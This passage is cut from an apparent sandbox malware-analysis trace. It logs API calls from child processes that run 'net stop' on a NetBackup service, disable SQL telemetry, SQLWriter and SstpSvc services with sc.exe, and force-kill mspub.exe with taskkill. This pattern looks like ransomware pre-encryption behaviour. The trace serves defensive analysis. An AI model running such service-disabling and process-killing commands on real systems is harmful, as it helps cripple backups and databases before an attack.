14 [0056.129] LocalFree (hMem=0xc548a8) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䑠Å\x9e蛬ģవ") returned 0xf [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.129] LocalFree (hMem=0xc54460) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģస") returned 0x17 [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.129] LocalFree (hMem=0xc58c00) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģ఻") returned 0x18 [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.129] LocalFree (hMem=0xc58c00) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="㎐Æ\x9e蛬ģా") returned 0x21 [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0056.129] LocalFree (hMem=0xc63390) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģు") returned 0x15 [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0056.129] GetFileType (hFile=0x90) returned 0x2 [0056.129] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x9ef1f8 | out: lpMode=0x9ef1f8) returned 1 [0056.129] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0xc54268*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x9ef1fc, lpReserved=0x0 | out: lpBuffer=0xc54268*, lpNumberOfCharsWritten=0x9ef1fc*=0x15) returned 1 [0056.130] LocalFree (hMem=0xc54268) returned 0x0 [0056.130] NetApiBufferFree (Buffer=0xc57d70) returned 0x0 [0056.130] NetApiBufferFree (Buffer=0xc57bc0) returned 0x0 [0056.130] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop NetBackup BMR MTFTP Service /y" [0056.130] exit (_Code=1) Thread: id = 50 os_tid = 0x18c Process: id = "21" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x2ef000" os_pid = "0xdf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"sc.exe\" config SQLTELEMETRY start= disabled" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 51 os_tid = 0xa4c [0056.627] GetModuleHandleA (lpModuleName=0x0) returned 0xd90000 [0056.627] __set_app_type (_Type=0x1) [0056.627] __p__fmode () returned 0x76953c14 [0056.627] __p__commode () returned 0x769549ec [0056.627] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd95f00) returned 0x0 [0056.627] __wgetmainargs (in: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030, _DoWildCard=0, _StartInfo=0xd9e03c | out: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030) returned 0 [0056.627] SetThreadUILanguage (LangId=0x0) returned 0x2fe0409 [0056.632] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0056.632] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0056.632] _wcsicmp (_String1="config", _String2="query") returned -14 [0056.632] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0056.633] _wcsicmp (_String1="config", _String2="start") returned -16 [0056.633] _wcsicmp (_String1="config", _String2="pause") returned -13 [0056.633] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0056.633] _wcsicmp (_String1="config", _String2="control") returned -14 [0056.633] _wcsicmp (_String1="config", _String2="continue") returned -14 [0056.633] _wcsicmp (_String1="config", _String2="stop") returned -16 [0056.633] _wcsicmp (_String1="config", _String2="config") returned 0 [0056.633] ResolveDelayLoadedAPI () returned 0x73f2c440 [0056.633] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x33004e8 [0056.637] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0056.637] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0056.637] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0056.637] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0056.637] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0056.637] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0056.637] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0056.637] OpenServiceW (hSCManager=0x33004e8, lpServiceName="SQLTELEMETRY", dwDesiredAccess=0x3) returned 0x0 [0056.638] GetLastError () returned 0x424 [0056.638] _ultow (in: _Dest=0x424, _Radix=50854368 | out: _Dest=0x424) returned="1060" [0056.638] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xd9e3c0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0056.641] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x307f9bc, nSize=0x2, Arguments=0x307f9d4 | out: lpBuffer="拀̰識̇蕗Ù\x04") returned 0x62 [0056.642] GetFileType (hFile=0x344) returned 0x3 [0056.642] LocalAlloc (uFlags=0x0, uBytes=0xc4) returned 0x3305f50 [0056.642] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", cchWideChar=98, lpMultiByteStr=0x3305f50, cbMultiByte=196, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", lpUsedDefaultChar=0x0) returned 98 [0056.642] WriteFile (in: hFile=0x344, lpBuffer=0x3305f50*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x307f9b0, lpOverlapped=0x0 | out: lpBuffer=0x3305f50*, lpNumberOfBytesWritten=0x307f9b0*=0x62, lpOverlapped=0x0) returned 1 [0056.644] LocalFree (hMem=0x3305f50) returned 0x0 [0056.644] LocalFree (hMem=0x33062c0) returned 0x0 [0056.644] LocalFree (hMem=0x0) returned 0x0 [0056.644] CloseServiceHandle (hSCObject=0x33004e8) returned 1 [0056.644] LocalFree (hMem=0x0) returned 0x0 [0056.645] exit (_Code=1060) Thread: id = 55 os_tid = 0x5f4 Process: id = "22" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5e95c000" os_pid = "0xd98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xdf8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0x734 Thread: id = 53 os_tid = 0xa00 Thread: id = 54 os_tid = 0x650 Process: id = "23" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x81fc000" os_pid = "0x450" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"sc.exe\" config SQLTELEMETRY$ECWDB2 start= disabled" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 56 os_tid = 0xe74 [0056.940] GetModuleHandleA (lpModuleName=0x0) returned 0xd90000 [0056.940] __set_app_type (_Type=0x1) [0056.940] __p__fmode () returned 0x76953c14 [0056.940] __p__commode () returned 0x769549ec [0056.940] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd95f00) returned 0x0 [0056.940] __wgetmainargs (in: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030, _DoWildCard=0, _StartInfo=0xd9e03c | out: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030) returned 0 [0056.941] SetThreadUILanguage (LangId=0x0) returned 0x30f0409 [0056.953] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0056.953] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0056.953] _wcsicmp (_String1="config", _String2="query") returned -14 [0056.953] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0056.953] _wcsicmp (_String1="config", _String2="start") returned -16 [0056.954] _wcsicmp (_String1="config", _String2="pause") returned -13 [0056.954] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0056.954] _wcsicmp (_String1="config", _String2="control") returned -14 [0056.954] _wcsicmp (_String1="config", _String2="continue") returned -14 [0056.954] _wcsicmp (_String1="config", _String2="stop") returned -16 [0056.954] _wcsicmp (_String1="config", _String2="config") returned 0 [0056.954] ResolveDelayLoadedAPI () returned 0x73f2c440 [0056.954] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x34304e8 [0056.957] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0056.957] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0056.957] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0056.957] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0056.957] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0056.958] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0056.958] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0056.958] OpenServiceW (hSCManager=0x34304e8, lpServiceName="SQLTELEMETRY$ECWDB2", dwDesiredAccess=0x3) returned 0x0 [0056.958] GetLastError () returned 0x424 [0056.958] _ultow (in: _Dest=0x424, _Radix=52951212 | out: _Dest=0x424) returned="1060" [0056.958] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xd9e3c0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0056.959] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x327f888, nSize=0x2, Arguments=0x327f8a0 | out: lpBuffer="拘̓̧蕗Ù\x04") returned 0x62 [0056.960] GetFileType (hFile=0x344) returned 0x3 [0056.960] LocalAlloc (uFlags=0x0, uBytes=0xc4) returned 0x3435f68 [0056.960] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", cchWideChar=98, lpMultiByteStr=0x3435f68, cbMultiByte=196, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", lpUsedDefaultChar=0x0) returned 98 [0056.960] WriteFile (in: hFile=0x344, lpBuffer=0x3435f68*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x327f87c, lpOverlapped=0x0 | out: lpBuffer=0x3435f68*, lpNumberOfBytesWritten=0x327f87c*=0x62, lpOverlapped=0x0) returned 1 [0056.960] LocalFree (hMem=0x3435f68) returned 0x0 [0056.960] LocalFree (hMem=0x34362d8) returned 0x0 [0056.960] LocalFree (hMem=0x0) returned 0x0 [0056.960] CloseServiceHandle (hSCObject=0x34304e8) returned 1 [0056.961] LocalFree (hMem=0x0) returned 0x0 [0056.961] exit (_Code=1060) Thread: id = 60 os_tid = 0xdfc Process: id = "24" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x83ea000" os_pid = "0x8d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x450" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 57 os_tid = 0xe3c Thread: id = 58 os_tid = 0xa54 Thread: id = 59 os_tid = 0xfd0 Process: id = "25" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x801000" os_pid = "0x2ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"sc.exe\" config SQLWriter start= disabled" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 61 os_tid = 0xfb0 [0057.387] GetModuleHandleA (lpModuleName=0x0) returned 0xd90000 [0057.387] __set_app_type (_Type=0x1) [0057.387] __p__fmode () returned 0x76953c14 [0057.387] __p__commode () returned 0x769549ec [0057.387] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd95f00) returned 0x0 [0057.387] __wgetmainargs (in: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030, _DoWildCard=0, _StartInfo=0xd9e03c | out: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030) returned 0 [0057.388] SetThreadUILanguage (LangId=0x0) returned 0x2f30409 [0057.392] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.392] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0057.392] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0057.393] _wcsicmp (_String1="config", _String2="query") returned -14 [0057.393] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0057.393] _wcsicmp (_String1="config", _String2="start") returned -16 [0057.393] _wcsicmp (_String1="config", _String2="pause") returned -13 [0057.393] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0057.393] _wcsicmp (_String1="config", _String2="control") returned -14 [0057.393] _wcsicmp (_String1="config", _String2="continue") returned -14 [0057.393] _wcsicmp (_String1="config", _String2="stop") returned -16 [0057.393] _wcsicmp (_String1="config", _String2="config") returned 0 [0057.393] ResolveDelayLoadedAPI () returned 0x73f2c440 [0057.393] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x30004e8 [0057.397] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0057.397] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0057.397] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0057.397] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0057.397] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0057.397] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0057.397] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0057.398] OpenServiceW (hSCManager=0x30004e8, lpServiceName="SQLWriter", dwDesiredAccess=0x3) returned 0x0 [0057.398] GetLastError () returned 0x424 [0057.398] _ultow (in: _Dest=0x424, _Radix=13106076 | out: _Dest=0x424) returned="1060" [0057.398] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xd9e3c0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0057.400] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xc7fb78, nSize=0x2, Arguments=0xc7fb90 | out: lpBuffer="抨̀﮸Ç蕗Ù\x04") returned 0x62 [0057.400] GetFileType (hFile=0x344) returned 0x3 [0057.400] LocalAlloc (uFlags=0x0, uBytes=0xc4) returned 0x3005f38 [0057.400] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", cchWideChar=98, lpMultiByteStr=0x3005f38, cbMultiByte=196, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", lpUsedDefaultChar=0x0) returned 98 [0057.400] WriteFile (in: hFile=0x344, lpBuffer=0x3005f38*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0xc7fb6c, lpOverlapped=0x0 | out: lpBuffer=0x3005f38*, lpNumberOfBytesWritten=0xc7fb6c*=0x62, lpOverlapped=0x0) returned 1 [0057.400] LocalFree (hMem=0x3005f38) returned 0x0 [0057.400] LocalFree (hMem=0x30062a8) returned 0x0 [0057.401] LocalFree (hMem=0x0) returned 0x0 [0057.401] CloseServiceHandle (hSCObject=0x30004e8) returned 1 [0057.401] LocalFree (hMem=0x0) returned 0x0 [0057.401] exit (_Code=1060) Thread: id = 65 os_tid = 0xffc Process: id = "26" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x85e3000" os_pid = "0xeec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x2ec" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 62 os_tid = 0x488 Thread: id = 63 os_tid = 0xb94 Thread: id = 64 os_tid = 0x5f8 Process: id = "27" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x8188000" os_pid = "0xc10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"sc.exe\" config SstpSvc start= disabled" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 66 os_tid = 0xf4c [0057.815] GetModuleHandleA (lpModuleName=0x0) returned 0xd90000 [0057.815] __set_app_type (_Type=0x1) [0057.816] __p__fmode () returned 0x76953c14 [0057.816] __p__commode () returned 0x769549ec [0057.816] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd95f00) returned 0x0 [0057.816] __wgetmainargs (in: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030, _DoWildCard=0, _StartInfo=0xd9e03c | out: _Argc=0xd9e028, _Argv=0xd9e02c, _Env=0xd9e030) returned 0 [0057.816] SetThreadUILanguage (LangId=0x0) returned 0x630409 [0057.819] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.819] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0057.819] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0057.819] _wcsicmp (_String1="config", _String2="query") returned -14 [0057.819] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0057.820] _wcsicmp (_String1="config", _String2="start") returned -16 [0057.820] _wcsicmp (_String1="config", _String2="pause") returned -13 [0057.820] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0057.820] _wcsicmp (_String1="config", _String2="control") returned -14 [0057.820] _wcsicmp (_String1="config", _String2="continue") returned -14 [0057.820] _wcsicmp (_String1="config", _String2="stop") returned -16 [0057.820] _wcsicmp (_String1="config", _String2="config") returned 0 [0057.820] ResolveDelayLoadedAPI () returned 0x73f2c440 [0057.820] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x8704e8 [0057.823] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0057.824] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0057.824] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0057.824] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0057.824] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0057.824] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0057.824] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0057.824] OpenServiceW (hSCManager=0x8704e8, lpServiceName="SstpSvc", dwDesiredAccess=0x3) returned 0x8761f0 [0057.824] ResolveDelayLoadedAPI () returned 0x73f2bee0 [0057.824] QueryServiceConfig2W (in: hService=0x8761f0, dwInfoLevel=0x3, lpBuffer=0x83fbdc, cbBufSize=0x4, pcbBytesNeeded=0x83fbd4 | out: lpBuffer=0x83fbdc, pcbBytesNeeded=0x83fbd4) returned 1 [0057.825] ChangeServiceConfigW (in: hService=0x8761f0, dwServiceType=0xffffffff, dwStartType=0x4, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0057.826] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x83fb90, nSize=0x2, Arguments=0x83fbd4 | out: lpBuffer="挠\x87ﰌ\x83빊Ù\x04") returned 0x22 [0057.827] GetFileType (hFile=0x344) returned 0x3 [0057.827] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x8763b8 [0057.827] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] ChangeServiceConfig SUCCESS\r\n", cchWideChar=34, lpMultiByteStr=0x8763b8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] ChangeServiceConfig SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 34 [0057.827] WriteFile (in: hFile=0x344, lpBuffer=0x8763b8*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x83fb84, lpOverlapped=0x0 | out: lpBuffer=0x8763b8*, lpNumberOfBytesWritten=0x83fb84*=0x22, lpOverlapped=0x0) returned 1 [0057.827] LocalFree (hMem=0x8763b8) returned 0x0 [0057.827] LocalFree (hMem=0x876320) returned 0x0 [0057.827] LocalFree (hMem=0x0) returned 0x0 [0057.827] CloseServiceHandle (hSCObject=0x8761f0) returned 1 [0057.828] CloseServiceHandle (hSCObject=0x8704e8) returned 1 [0057.828] LocalFree (hMem=0x0) returned 0x0 [0057.828] exit (_Code=0) Thread: id = 70 os_tid = 0xf28 Process: id = "28" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7d16000" os_pid = "0x4a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0xc10" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 67 os_tid = 0xff0 Thread: id = 68 os_tid = 0xb04 Thread: id = 69 os_tid = 0xfb4 Process: id = "29" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x79a0000" os_pid = "0xfc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"taskkill.exe\" /IM mspub.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 71 os_tid = 0xbac Thread: id = 75 os_tid = 0xfac Thread: id = 76 os_tid = 0xa90 